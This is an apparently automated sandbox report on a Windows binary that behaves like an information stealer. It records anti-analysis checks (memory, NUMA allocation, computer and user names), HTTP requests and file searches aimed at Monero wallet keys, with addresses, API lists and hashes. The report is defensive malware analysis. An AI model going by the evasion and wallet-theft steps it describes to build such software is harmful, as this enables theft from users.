                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: e40e7268f7035c3b20318134e1674e3621ae596cf9283633cb49a53ef8abf238
                              • Instruction ID: 3383cd6d65cac6920b2869dbf17842652e12575b2241996106d8b56cf6132163
                              • Opcode Fuzzy Hash: e40e7268f7035c3b20318134e1674e3621ae596cf9283633cb49a53ef8abf238
                              • Instruction Fuzzy Hash: FB312C71940208BBDB05FBF0DC56BEE7778AF24700F908518F252B6192DFB06A05CBA2
                              Function 00121220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1436 121220-121247 call 1389b0 GlobalMemoryStatusEx 1439 121273-12127a 1436->1439 1440 121249-121271 call 13da00 * 2 1436->1440 1442 121281-121285 1439->1442 1440->1442 1444 121287 1442->1444 1445 12129a-12129d 1442->1445 1447 121292-121294 ExitProcess 1444->1447 1448 121289-121290 1444->1448 1448->1445 1448->1447
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0012123E
                              • __aulldiv.LIBCMT ref: 00121258
                              • __aulldiv.LIBCMT ref: 00121266
                              • ExitProcess.KERNEL32 ref: 00121294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: 84f3048af2cc390b565958d990ab7cd8e5de9de882446ea23c319d0f63d03886
                              • Instruction ID: 31fa46fd4e5fc402f28a198e4cfa08a08030b633e4d02772dfe612f2155657de
                              • Opcode Fuzzy Hash: 84f3048af2cc390b565958d990ab7cd8e5de9de882446ea23c319d0f63d03886
                              • Instruction Fuzzy Hash: 97011DB0D44318FAEB10DBE4ED49BAEBB78AB24705F308048F705B62C0D7B455558B99
                              Function 00136AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1450 136af3 1451 136b0a 1450->1451 1453 136aba-136ad7 call 13aad0 OpenEventA 1451->1453 1454 136b0c-136b22 call 136920 call 135b10 CloseHandle ExitProcess 1451->1454 1459 136af5-136b04 CloseHandle Sleep 1453->1459 1460 136ad9-136af1 call 13aad0 CreateEventA 1453->1460 1459->1451 1460->1454
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00FF9198,?,0014110C,?,00000000,?,00141110,?,00000000,00140AEF), ref: 00136ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00136AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00136AF9
                              • Sleep.KERNEL32(00001770), ref: 00136B04
                              • CloseHandle.KERNEL32(?,00000000,?,00FF9198,?,0014110C,?,00000000,?,00141110,?,00000000,00140AEF), ref: 00136B1A
                              • ExitProcess.KERNEL32 ref: 00136B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: a742b5645727437cde0d43c0227ec0c295b8649f2a6a5e99fd5a9153ee2a599e
                              • Instruction ID: a5596bbc9c0339a73978337f60cf2fa5bb22aa0307e1a7ee3d63dda9ebe7cdef
                              • Opcode Fuzzy Hash: a742b5645727437cde0d43c0227ec0c295b8649f2a6a5e99fd5a9153ee2a599e
                              • Instruction Fuzzy Hash: 7DF0D470A40219BBE711ABA0DC1ABBEBA78EB14701F10C914F513A61D5DBF05540EAA6
                              Function 001247B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00124839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00124849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: bbe18a6b64efae1d877b92fdfea9ab3acf6475fe30f1a1c5a65a1ca630c1ae2d
                              • Instruction ID: 253fedf34cb0c7430c9f17febb560e5ab47a4fd8cf8be5d29565fa0b09221bb7
                              • Opcode Fuzzy Hash: bbe18a6b64efae1d877b92fdfea9ab3acf6475fe30f1a1c5a65a1ca630c1ae2d
                              • Instruction Fuzzy Hash: 8E214DB1D00209ABDF14DFA4E845ADE7B78FF44320F108625F969A72C1EB706A05CF92
                              Function 001351F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                                • Part of subcall function 00126280: InternetOpenA.WININET(00140DFE,00000001,00000000,00000000,00000000), ref: 001262E1
                                • Part of subcall function 00126280: StrCmpCA.SHLWAPI(?,00FFE7D8), ref: 00126303
                                • Part of subcall function 00126280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00126335
                                • Part of subcall function 00126280: HttpOpenRequestA.WININET(00000000,GET,?,00FFE338,00000000,00000000,00400100,00000000), ref: 00126385
                                • Part of subcall function 00126280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001263BF
                                • Part of subcall function 00126280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001263D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00135228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: c793f7c4ee09193e316e1f44dca8be6265fc72a14a97ddfaf578c27e8aa22e47
                              • Instruction ID: 8d83b94216ccbabed5cbd3ed538a7aeae1920419d82aacaae602f5dc2eb57580
                              • Opcode Fuzzy Hash: c793f7c4ee09193e316e1f44dca8be6265fc72a14a97ddfaf578c27e8aa22e47
                              • Instruction Fuzzy Hash: 08111231910148BBDB14FF74ED92AED7739AF60300FC04158F85A5B592EF31AB15CA91
                              Function 001378E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00137910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00137917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 0013792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: f224350183e7be5603a122b1e99862ea7198cfd4987cab6405a4df70a482dd9f
                              • Instruction ID: 9140dcc8c5739ed301473ee0128126c76a4c78db7c1f98bf069fc178ed9db50e
                              • Opcode Fuzzy Hash: f224350183e7be5603a122b1e99862ea7198cfd4987cab6405a4df70a482dd9f
                              • Instruction Fuzzy Hash: 010181B1A04608EBD714DF99DD45BAABBBCFB04B35F10421AFA45F7280C37459008BA2
                              Function 00121110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0012112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00121132
                              • ExitProcess.KERNEL32 ref: 00121143
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: 7bd441c9996da7c3257481cb81a114f1dfd27ac2a52912b31e6c777125aa928c
                              • Instruction ID: e50794417332e81ba0d084ca16cab0facfd6ded9e8d8c312877d42d6fd822d0c
                              • Opcode Fuzzy Hash: 7bd441c9996da7c3257481cb81a114f1dfd27ac2a52912b31e6c777125aa928c
                              • Instruction Fuzzy Hash: 3DE0E671985308FBE711ABA0AC0AB097A7CEB14B01F104154F709771D0D7F526509A99
                              Function 001210A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 001210B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 001210F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 1c421bd8f8da481a94df737dfae69165ec29d1fd7962cccdb10140c783ff3785
                              • Instruction ID: 48eba0d768a20eb4d7568c3f18bd81710ebbe4bcd59b063549cf6146834fe06c
                              • Opcode Fuzzy Hash: 1c421bd8f8da481a94df737dfae69165ec29d1fd7962cccdb10140c783ff3785
                              • Instruction Fuzzy Hash: 86F0E271641318BBE714DBA4AC49FAAB7ECE705B15F305448F504E3280D672AE00CBA4
                              Function 00121190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00137910
                                • Part of subcall function 001378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00137917
                                • Part of subcall function 001378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0013792F
                                • Part of subcall function 00137850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001211B7), ref: 00137880
                                • Part of subcall function 00137850: RtlAllocateHeap.NTDLL(00000000), ref: 00137887
                                • Part of subcall function 00137850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0013789F
                              • ExitProcess.KERNEL32 ref: 001211C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: 9bdf2a04e1185e7501135741a9c6a23ea3c7b811ac0664166280a452f11c9da7
                              • Instruction ID: 30238aba1440ac1905e5c6760280a6b4710a8a82ed5d3156743dc4c165844f70
                              • Opcode Fuzzy Hash: 9bdf2a04e1185e7501135741a9c6a23ea3c7b811ac0664166280a452f11c9da7
                              • Instruction Fuzzy Hash: 13E012B591430963CA10B3B5BC0AB2A369C5B34345F044825FA49E3152FBA5F8208A66

                              Non-executed Functions

                              Function 001338B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 001338CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 001338E3
                              • lstrcat.KERNEL32(?,?), ref: 00133935
                              • StrCmpCA.SHLWAPI(?,00140F70), ref: 00133947
                              • StrCmpCA.SHLWAPI(?,00140F74), ref: 0013395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00133C67
                              • FindClose.KERNEL32(000000FF), ref: 00133C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 677925c16722eb82d85a4ccd45eef9cc3d9b765909d32ab58175c9bf4331eabc
                              • Instruction ID: 3d6e61189d7fc2ba31a0cc8d86a0e578b8d143a86c23e63bafc2a329abdbc331
                              • Opcode Fuzzy Hash: 677925c16722eb82d85a4ccd45eef9cc3d9b765909d32ab58175c9bf4331eabc
                              • Instruction Fuzzy Hash: 00A13FB1A00218ABDB25DFA4DC85FEA737DBF58300F048598E61DA6141EB759B84CF62
                              Function 0012BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                              • FindFirstFileA.KERNEL32(00000000,?,00140B32,00140B2B,00000000,?,?,?,001413F4,00140B2A), ref: 0012BEF5
                              • StrCmpCA.SHLWAPI(?,001413F8), ref: 0012BF4D
                              • StrCmpCA.SHLWAPI(?,001413FC), ref: 0012BF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0012C7BF
                              • FindClose.KERNEL32(000000FF), ref: 0012C7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
